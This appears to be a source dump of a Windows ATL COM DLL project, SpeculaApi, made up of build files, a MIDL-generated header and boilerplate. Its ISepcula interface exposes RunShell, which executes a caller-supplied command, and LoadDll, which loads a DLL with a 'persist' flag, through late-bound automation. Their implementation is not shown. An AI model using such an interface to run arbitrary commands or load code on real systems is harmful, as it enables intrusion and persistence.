<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)bin\</OutDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IgnoreImportLibrary>true</IgnoreImportLibrary>
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)bin\</OutDir>
<TargetName>$(ProjectName).x64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;_DEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<TargetEnvironment>Win32</TargetEnvironment>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<PreprocessorDefinitions>WIN32;_WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
<DebugInformationFormat>None</DebugInformationFormat>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<TargetEnvironment>Win32</TargetEnvironment>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>MaxSpeed</Optimization>
<PreprocessorDefinitions>_WINDOWS;NDEBUG;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<PrecompiledHeaderFile>pch.h</PrecompiledHeaderFile>
<SDLCheck>true</SDLCheck>
<DebugInformationFormat>None</DebugInformationFormat>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Midl>
<MkTypLibCompatible>false</MkTypLibCompatible>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<HeaderFileName>SpeculaApi_i.h</HeaderFileName>
<InterfaceIdentifierFileName>SpeculaApi_i.c</InterfaceIdentifierFileName>
<ProxyFileName>SpeculaApi_p.c</ProxyFileName>
<GenerateStublessProxies>true</GenerateStublessProxies>
<TypeLibraryName>$(IntDir)SpeculaApi.tlb</TypeLibraryName>
<DllDataFileName />
<ValidateAllParameters>true</ValidateAllParameters>
</Midl>
<ResourceCompile>
<Culture>0x0409</Culture>
<AdditionalIncludeDirectories>$(IntDir);%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<SubSystem>Windows</SubSystem>
<ModuleDefinitionFile>.\SpeculaApi.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
<GenerateDebugInformation>false</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="dllmain.h" />
<ClInclude Include="framework.h" />
<ClInclude Include="pch.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="Sepcula.h" />
<ClInclude Include="SpeculaApi_i.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="pch.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="Sepcula.cpp" />
<ClCompile Include="SpeculaApi.cpp" />
<ClCompile Include="SpeculaApi_i.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="SpeculaApi.rc" />
</ItemGroup>
<ItemGroup>
<None Include="Sepcula.rgs" />
<None Include="SpeculaApi.def" />
<None Include="SpeculaApi.rgs" />
</ItemGroup>
<ItemGroup>
<Midl Include="SpeculaApi.idl" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: api/SpeculaApi/SpeculaApi.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
<Filter Include="Generated Files">
<UniqueIdentifier>{53bbe418-42c7-4cd4-a4d9-3d1ca2106f6e}</UniqueIdentifier>
<SourceControlFiles>False</SourceControlFiles>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="framework.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="dllmain.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="SpeculaApi_i.h">
<Filter>Generated Files</Filter>
</ClInclude>
<ClInclude Include="pch.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Sepcula.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="SpeculaApi.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="dllmain.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="SpeculaApi_i.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="pch.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Sepcula.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="SpeculaApi.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<None Include="SpeculaApi.rgs">
<Filter>Resource Files</Filter>
</None>
<None Include="SpeculaApi.def">
<Filter>Source Files</Filter>
</None>
<None Include="Sepcula.rgs">
<Filter>Resource Files</Filter>
</None>
</ItemGroup>
<ItemGroup>
<Midl Include="SpeculaApi.idl">
<Filter>Source Files</Filter>
</Midl>
</ItemGroup>
</Project>
================================================
FILE: api/SpeculaApi/SpeculaApi_i.h
================================================
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 8.01.0628 */
/* at Mon Jan 18 21:14:07 2038
*/
/* Compiler settings for SpeculaApi.idl:
Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0628
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
/* @@MIDL_FILE_HEADING( ) */
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */
#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/
#ifndef __SpeculaApi_i_h__
#define __SpeculaApi_i_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
#ifndef DECLSPEC_XFGVIRT
#if defined(_CONTROL_FLOW_GUARD_XFG)
#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))
#else
#define DECLSPEC_XFGVIRT(base, func)
#endif
#endif
/* Forward Declarations */
#ifndef __ISepcula_FWD_DEFINED__
#define __ISepcula_FWD_DEFINED__
typedef interface ISepcula ISepcula;
#endif /* __ISepcula_FWD_DEFINED__ */
#ifndef __Sepcula_FWD_DEFINED__
#define __Sepcula_FWD_DEFINED__
#ifdef __cplusplus
typedef class Sepcula Sepcula;
#else
typedef struct Sepcula Sepcula;
#endif /* __cplusplus */
#endif /* __Sepcula_FWD_DEFINED__ */
/* header files for imported files */
#include "oaidl.h"
#include "ocidl.h"
#include "shobjidl.h"
#ifdef __cplusplus
extern "C"{
#endif
#ifndef __ISepcula_INTERFACE_DEFINED__
#define __ISepcula_INTERFACE_DEFINED__
/* interface ISepcula */
/* [unique][nonextensible][dual][uuid][object] */
EXTERN_C const IID IID_ISepcula;
#if defined(__cplusplus) && !defined(CINTERFACE)
// C++ view of the ISepcula COM interface, emitted by MIDL from SpeculaApi.idl.
// This header is regenerated on every build, so comments placed here do not
// survive a rebuild; durable documentation belongs in the .idl file.
//
// The interface derives from IDispatch (it is declared [dual]), so besides the
// vtable entries below it is reachable by late-bound automation clients that
// resolve method names at run time.
//
// NOTE(review): going by the parameter names, both methods accept caller-supplied
// strings (a command and a DLL path). Any validation or restriction of those
// inputs would live in the implementation (Sepcula.cpp), which is not shown
// here; confirm there before assuming any exists.
MIDL_INTERFACE("b0f5f947-8064-48f7-a623-5c058dc91cc8")
ISepcula : public IDispatch
{
public:
// RunShell: [in] cmd string, [in, optional] timeout as a VARIANT, and a BSTR
// returned through `result`. The unit and default of `timeout` are not visible
// in this header. TODO confirm against the implementation.
virtual /* [id] */ HRESULT STDMETHODCALLTYPE RunShell(
/* [in] */ BSTR cmd,
/* [optional][in] */ VARIANT timeout,
/* [retval][out] */ BSTR *result) = 0;
// LoadDll: [in] path string and [in] persist flag, with a boolean returned
// through `status`. What `persist` changes is not visible in this header.
// TODO confirm against the implementation.
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadDll(
/* [in] */ BSTR path,
/* [in] */ boolean persist,
/* [retval][out] */ boolean *status) = 0;
};
#else /* C style interface */
typedef struct ISepculaVtbl
{
BEGIN_INTERFACE
DECLSPEC_XFGVIRT(IUnknown, QueryInterface)
HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
ISepcula * This,
/* [in] */ REFIID riid,
/* [annotation][iid_is][out] */
_COM_Outptr_ void **ppvObject);
DECLSPEC_XFGVIRT(IUnknown, AddRef)
ULONG ( STDMETHODCALLTYPE *AddRef )(
ISepcula * This);
DECLSPEC_XFGVIRT(IUnknown, Release)
ULONG ( STDMETHODCALLTYPE *Release )(
ISepcula * This);
DECLSPEC_XFGVIRT(IDispatch, GetTypeInfoCount)
HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
ISepcula * This,
/* [out] */ UINT *pctinfo);
DECLSPEC_XFGVIRT(IDispatch, GetTypeInfo)
HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
ISepcula * This,
/* [in] */ UINT iTInfo,
/* [in] */ LCID lcid,
/* [out] */ ITypeInfo **ppTInfo);
DECLSPEC_XFGVIRT(IDispatch, GetIDsOfNames)
HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
ISepcula * This,
/* [in] */ REFIID riid,
/* [size_is][in] */ LPOLESTR *rgszNames,
/* [range][in] */ UINT cNames,
/* [in] */ LCID lcid,
/* [size_is][out] */ DISPID *rgDispId);
DECLSPEC_XFGVIRT(IDispatch, Invoke)
/* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )(
ISepcula * This,
/* [annotation][in] */
_In_ DISPID dispIdMember,
/* [annotation][in] */
_In_ REFIID riid,
/* [annotation][in] */
_In_ LCID lcid,
/* [annotation][in] */
_In_ WORD wFlags,
/* [annotation][out][in] */
_In_ DISPPARAMS *pDispParams,
/* [annotation][out] */
_Out_opt_ VARIANT *pVarResult,
/* [annotation][out] */
_Out_opt_ EXCEPINFO *pExcepInfo,
/* [annotation][out] */
_Out_opt_ UINT *puArgErr);
DECLSPEC_XFGVIRT(ISepcula, RunShell)
/* [id] */ HRESULT ( STDMETHODCALLTYPE *RunShell )(
ISepcula * This,
/* [in] */ BSTR cmd,
/* [optional][in] */ VARIANT timeout,
/* [retval][out] */ BSTR *result);
DECLSPEC_XFGVIRT(ISepcula, LoadDll)
/* [id] */ HRESULT ( STDMETHODCALLTYPE *LoadDll )(
ISepcula * This,
/* [in] */ BSTR path,
/* [in] */ boolean persist,
/* [retval][out] */ boolean *status);
END_INTERFACE
} ISepculaVtbl;
interface ISepcula
{
CONST_VTBL struct ISepculaVtbl *lpVtbl;
};
#ifdef COBJMACROS
#define ISepcula_QueryInterface(This,riid,ppvObject) \
( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) )
#define ISepcula_AddRef(This) \
( (This)->lpVtbl -> AddRef(This) )
#define ISepcula_Release(This) \
( (This)->lpVtbl -> Release(This) )
#define ISepcula_GetTypeInfoCount(This,pctinfo) \
( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) )
#define ISepcula_GetTypeInfo(This,iTInfo,lcid,ppTInfo) \
( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) )
#define ISepcula_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) \
( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) )
#define ISepcula_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) \
( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) )
#define ISepcula_RunShell(This,cmd,timeout,result) \
( (This)->lpVtbl -> RunShell(This,cmd,timeout,result) )
#define ISepcula_LoadDll(This,path,persist,status) \
( (This)->lpVtbl -> LoadDll(This,path,persist,status) )
#endif /* COBJMACROS */
#endif /* C style interface */
#endif /* __ISepcula_INTERFACE_DEFINED__ */
#ifndef __SpeculaApiLib_LIBRARY_DEFINED__
#define __SpeculaApiLib_LIBRARY_DEFINED__
/* library SpeculaApiLib */
/* [version][uuid] */
EXTERN_C const IID LIBID_SpeculaApiLib;
EXTERN_C const CLSID CLSID_Sepcula;
#ifdef __cplusplus
class DECLSPEC_UUID("e8b55279-c6b4-48f3-8138-b727337c0236")
Sepcula;
#endif
#endif /* __SpeculaApiLib_LIBRARY_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
unsigned long __RPC_USER BSTR_UserSize( unsigned long *, unsigned long , BSTR * );
unsigned char * __RPC_USER BSTR_UserMarshal( unsigned long *, unsigned char *, BSTR * );
unsigned char * __RPC_USER BSTR_UserUnmarshal(unsigned long *, unsigned char *, BSTR * );
void __RPC_USER BSTR_UserFree( unsigned long *, BSTR * );
unsigned long __RPC_USER VARIANT_UserSize( unsigned long *, unsigned long , VARIANT * );
unsigned char * __RPC_USER VARIANT_UserMarshal( unsigned long *, unsigned char *, VARIANT * );
unsigned char * __RPC_USER VARIANT_UserUnmarshal(unsigned long *, unsigned char *, VARIANT * );
void __RPC_USER VARIANT_UserFree( unsigned long *, VARIANT * );
unsigned long __RPC_USER BSTR_UserSize64( unsigned long *, unsigned long , BSTR * );
unsigned char * __RPC_USER BSTR_UserMarshal64( unsigned long *, unsigned char *, BSTR * );
unsigned char * __RPC_USER BSTR_UserUnmarshal64(unsigned long *, unsigned char *, BSTR * );
void __RPC_USER BSTR_UserFree64( unsigned long *, BSTR * );
unsigned long __RPC_USER VARIANT_UserSize64( unsigned long *, unsigned long , VARIANT * );
unsigned char * __RPC_USER VARIANT_UserMarshal64( unsigned long *, unsigned char *, VARIANT * );
unsigned char * __RPC_USER VARIANT_UserUnmarshal64(unsigned long *, unsigned char *, VARIANT * );
void __RPC_USER VARIANT_UserFree64( unsigned long *, VARIANT * );
/* end of Additional Prototypes */
#ifdef __cplusplus
}
#endif
#endif
================================================
FILE: api/SpeculaApi/SpeculaApips.def
================================================
LIBRARY
EXPORTS
DllGetClassObject PRIVATE
DllCanUnloadNow PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
================================================
FILE: api/SpeculaApi/dllmain.cpp
================================================
// dllmain.cpp : Implementation of DllMain.
#include "pch.h"
#include "framework.h"
#include "resource.h"
#include "SpeculaApi_i.h"
#include "dllmain.h"
CSpeculaApiModule _AtlModule;
// DLL Entry Point
extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    // The module handle is not needed here; the cast only marks the parameter
    // as intentionally unused.
    (void)hInstance;

    // All loader notifications (attach/detach) are handled by the ATL module
    // object; this function adds no logic of its own.
    const BOOL handled = _AtlModule.DllMain(dwReason, lpReserved);
    return handled;
}
================================================
FILE: api/SpeculaApi/dllmain.h
================================================
// dllmain.h : Declaration of module class.
// ATL module class for the SpeculaApi DLL. The single global instance
// (_AtlModule, declared below and defined in dllmain.cpp) is what DllMain
// forwards loader notifications to.
class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >
{
public :
// Ties this module to the type library identified by LIBID_SpeculaApiLib
// (declared in the MIDL-generated SpeculaApi_i.h).
DECLARE_LIBID(LIBID_SpeculaApiLib)
// Names the registry-script resource (IDR_SPECULAAPI, defined in resource.h)
// and the AppID GUID used when the module registers or unregisters itself.
DECLARE_REGISTRY_APPID_RESOURCEID(IDR_SPECULAAPI, "{5be8ef76-6253-482a-926e-d1d877de3b63}")
};
extern class CSpeculaApiModule _AtlModule;
================================================
FILE: api/SpeculaApi/framework.h
================================================
#pragma once
#ifndef STRICT
#define STRICT
#endif
#include "targetver.h"
#define _ATL_APARTMENT_THREADED
#define _ATL_NO_AUTOMATIC_NAMESPACE
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit
#define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW
#include "resource.h"
#include <atlbase.h>
#include <atlcom.h>
#include <atlctl.h>
================================================
FILE: api/SpeculaApi/pch.cpp
================================================
// pch.cpp: source file corresponding to the pre-compiled header
#include "pch.h"
// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.
================================================
FILE: api/SpeculaApi/pch.h
================================================
// pch.h: This is a precompiled header file.
// Files listed below are compiled only once, improving build performance for future builds.
// This also affects IntelliSense performance, including code completion and many code browsing features.
// However, files listed here are ALL re-compiled if any one of them is updated between builds.
// Do not add files here that you will be updating frequently as this negates the performance advantage.
#ifndef PCH_H
#define PCH_H
// add headers that you want to pre-compile here
#include "framework.h"
#endif //PCH_H
================================================
FILE: api/SpeculaApi/resource.h
================================================
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by SpeculaApi.rc
//
#define IDS_PROJNAME 100
#define IDR_SPECULAAPI 101
#define IDR_SEPCULA 106
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 201
#define _APS_NEXT_COMMAND_VALUE 32768
#define _APS_NEXT_CONTROL_VALUE 201
#define _APS_NEXT_SYMED_VALUE 107
#endif
#endif
================================================
FILE: api/SpeculaApi/targetver.h
================================================
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>
================================================
FILE: api/SpeculaApi.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 17
VisualStudioVersion = 17.7.34202.233
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpeculaApi", "SpeculaApi\SpeculaApi.vcxproj", "{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SpeculaApiPS", "SpeculaApiPS\SpeculaApiPS.vcxproj", "{B58767EE-5185-4E99-818F-6285332400E6}"
ProjectSection(ProjectDependencies) = postProject
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB} = {AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}
EndProjectSection
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.ActiveCfg = Debug|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x64.Build.0 = Debug|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.ActiveCfg = Debug|Win32
